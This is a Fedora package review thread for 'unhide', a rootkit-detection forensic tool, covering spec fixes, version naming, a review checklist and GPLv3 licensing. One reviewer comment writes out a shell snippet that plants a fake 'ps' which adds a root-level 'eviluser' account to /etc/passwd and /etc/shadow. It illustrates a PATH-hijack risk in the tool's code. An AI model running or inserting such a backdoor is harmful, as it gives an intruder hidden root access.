Description:

SPEC: http://rakesh.fedorapeople.org/spec/unhide.spec
SRPM: http://rakesh.fedorapeople.org/srpm/unhide-20080519-1.fc10.src.rpm

Unhide is a forensic tool to find processes and TCP/UDP ports hidden by rootkits, Linux kernel modules or by other techniques. It includes two utilities: unhide and unhide-tcp.

Unhide detects hidden processes using three techniques:
- comparing the output of /proc and /bin/ps
- comparing the information gathered from /bin/ps with the one gathered from system calls (syscall scanning)
- full scan of the process ID space (PIDs bruteforcing)

unhide-tcp identifies TCP/UDP ports that are listening but are not listed in /bin/netstat through brute forcing of all TCP/UDP ports available.
You probably only need one of these two lines, because the second one will overwrite the output of the first one:

%{__cc} %{optflags} unhide.c -o unhide
%{__cc} %{optflags} unhide-linux26.c -o unhide

Also you do not follow https://fedoraproject.org/wiki/Packaging/Guidelines#macros
Use either $RPM_OPT_FLAGS and $RPM_BUILD_ROOT or %optflags and %buildroot.
http://koji.fedoraproject.org/koji/taskinfo?taskID=921140
http://rakesh.fedorapeople.org/srpm/unhide-20080519-2.fc10.src.rpm
http://rakesh.fedorapeople.org/spec/unhide.spec

Updated - Thanks
I've just taken a look at the project page and as far as I see, upstream is a bit inconsistent with the name of the source. First version was "unhide.tgz", followed by "unhide02112007.tgz" while the current version seems to be "unhide20080519.tgz" (note the change from day-month-year to year-month-day). I suggest following http://fedoraproject.org/wiki/Packaging/NamingGuidelines#Snapshot_packages in naming your package (i.e. change

Version: 20080519
Release: 2%{?dist}

to

Version: 1.0
Release: 2%{?dist}.20080519

thus avoiding problems in the future).
http://rakesh.fedorapeople.org/spec/unhide.spec
http://rakesh.fedorapeople.org/srpm/unhide-1.0-1.fc10.20080519.src.rpm
Looking at the code, I see that unhide.c does:

#define COMMAND "ps -eLf | awk '{ print $2 }' | grep -v PID"

followed by

fich_tmp=popen (COMMAND, "r") ;

Now, my C is quite rusty, but
- AFAIR, you must be root to see some of the info this program requires
- anything named "ps" and found in root's PATH will be launched by the above code

To be honest, I would not run this "security application" on my system. I am afraid of something along

cat >> /usr/local/bin/ps << EOF
#! /bin/bash
echo "eviluser:x:0:0:root:/root:/bin/bash" >> /etc/passwd
echo "eviluser:$1$FvAHRp.t$nuD9eJQjgdgE7aXBNfBM/1:13805:0:99999:7:::" >> /etc/shadow
/bin/ps $*
EOF
(In reply to comment #5)
> To be honest, I would not run this "security application" on my system. I am
> afraid of something along
> cat >> /usr/local/bin/ps << EOF
> #! /bin/bash
> echo "eviluser:x:0:0:root:/root:/bin/bash" >> /etc/passwd
> echo "eviluser:$1$FvAHRp.t$nuD9eJQjgdgE7aXBNfBM/1:13805:0:99999:7:::" >>
> /etc/shadow
> /bin/ps $*
> EOF

/usr/local/bin is only writable by root and how does not packaging unhide prevent you from this attack? Or do you never use ps without an absolute path as root? Nevertheless, the attacker could also do this for any binary on the system, not only ps.
Package Review
==============

Key:
- = N/A
x = Check
! = Problem
? = Not evaluated

=== REQUIRED ITEMS ===
[x] Package is named according to the Package Naming Guidelines.
[x] Spec file name must match the base package %{name}, in the format %{name}.spec.
[x] Package meets the Packaging Guidelines.
[x] Package successfully compiles and builds into binary rpms on at least one supported architecture.
    Tested on: devel/x86_64
[x] Rpmlint output:
    source rpm: empty
    binary rpm: unhide.x86_64: W: incoherent-version-in-changelog 1.0-1 ['1.0-1.fc11.20080519', '1.0-1.20080519']
    => benign, but a fix would be nice
[x] Package is not relocatable.
[x] Buildroot is correct (%{_tmppath}/%{name}-%{version}-%{release}-root-%(%{__id_u} -n))
[x] Package is licensed with an open-source compatible license and meets other legal requirements as defined in the legal section of Packaging Guidelines.
[x] License field in the package spec file matches the actual license.
    License type as specified by source: GPLv3+
[x] If (and only if) the source package includes the text of the license(s) in its own file, then that file, containing the text of the license(s) for the package is included in %doc.
[x] Spec file is legible and written in American English.
[x] Sources used to build the package match the upstream source, as provided in the spec URL.
    SHA1SUM of package: 93f9c11de8beef78790ecaf1423dbcdf22532e53 /tmp/unhide20080519.tgz
[x] Package is not known to require ExcludeArch
[x] All build dependencies are listed in BuildRequires, except for any that are listed in the exceptions section of Packaging Guidelines.
[-] The spec file handles locales properly.
[-] ldconfig called in %post and %postun if required.
[x] Package must own all directories that it creates.
[-] Package requires other packages for directories it uses.
[x] Package does not contain duplicates in %files.
[x] Permissions on files are set properly.
[x] Package has a %clean section, which contains rm -rf %{buildroot}.
[x] Package consistently uses macros.
[x] Package contains code, or permissible content.
[-] Large documentation files are in a -doc subpackage, if required.
[x] Package uses nothing in %doc for runtime.
[-] Header files in -devel subpackage, if present.
[-] Static libraries in -devel subpackage, if present.
[-] Package requires pkgconfig, if .pc files are present.
[-] Development .so files in -devel subpackage, if present.
[-] Fully versioned dependency in subpackages, if present.
[x] Package does not contain any libtool archives (.la).
[-] Package contains a properly installed %{name}.desktop file if it is a GUI application.
[x] Package does not own files or directories owned by other packages.
[x] Final provides and requires are sane.

=== SUGGESTED ITEMS ===
[x] Latest version is packaged.
[x] Package does not include license text files separate from upstream.
[-] Description and summary sections in the package spec file contains translations for supported Non-English languages, if available.
[x] Reviewer should test that the package builds in mock.
    Tested on: devel/x86_64, F7/x86_64
[?] Package should compile and build into binary rpms on all supported architectures.
[x] Package functions as described.
[-] Scriptlets must be sane, if used.
[-] The placement of pkgconfig(.pc) files is correct.
[-] File based requires are sane.
[-] %check is present and the test passes.

=== Notes ===
1. Author's intent seems to be GPLv3+, but the sources do not include the bits required to specify this. I recommend getting in touch with the author and asking him to include the license in the source files, not only in the bundled readme files (spanish/eng).

Package APPROVED.
Thanks. Ok - I will communicate this to upstream.

New Package CVS Request
=======================
Package Name: unhide
Short Description: Tool to find hidden processes and TCP/UDP ports from rootkits
Owners: rakesh
Branches: F-8 F-9 F-10
InitialCC:
Cvsextras Commits: yes
Humm... the README.txt contains:

" // License GPL V.3 (http://www.gnu.org/licenses/gpl-3.0.html)"

Which sure sounds like the license tag should be GPLv3 here, not GPLv3+. In any case it might be good to clarify that before importing and building?

cvs done, but please clarify before importing. (F-8 branches are no longer accepted, so this was left out).
Yes, I have already dropped a mail. Which check before importing or building.
No reply regarding the license. I have resent the message. Probably the maintainer is on holidays. Let's wait for a few more days.
It is GPLv3 only. Got a reply today from the author. I will import now. I have requested the inclusion of the license in the source files as well. Thanks.
unhide-1.0-2.fc10.20080519 has been submitted as an update for Fedora 10. http://admin.fedoraproject.org/updates/unhide-1.0-2.fc10.20080519
unhide-1.0-2.fc9.20080519 has been submitted as an update for Fedora 9. http://admin.fedoraproject.org/updates/unhide-1.0-2.fc9.20080519
Package Change Request
======================
Package Name: unhide
New Branches: el6
Owners: cicku
Git done (by process-git-requests).
unhide-20130526-1.el6 has been submitted as an update for Fedora EPEL 6. https://admin.fedoraproject.org/updates/unhide-20130526-1.el6
unhide-20130526-1.el6 has been pushed to the Fedora EPEL 6 stable repository.